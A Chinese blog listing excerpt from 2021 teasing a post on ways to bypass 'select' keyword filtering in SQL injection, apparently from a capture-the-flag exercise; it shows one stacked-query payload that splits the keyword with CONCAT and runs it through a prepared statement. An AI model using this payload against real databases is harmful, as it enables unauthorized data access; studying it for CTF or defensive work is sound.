2021年3月21日
几种绕过select过滤的姿势
摘要: 预编译: 1、已知目标数据所在的具体库名表名,现在只差提取出来 payload:-1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt; 拆分开来如下 -1'; 阅读全文
posted @ 2021-03-21 16:49 2hangG3 阅读(901) 评论(0) 推荐(0) 编辑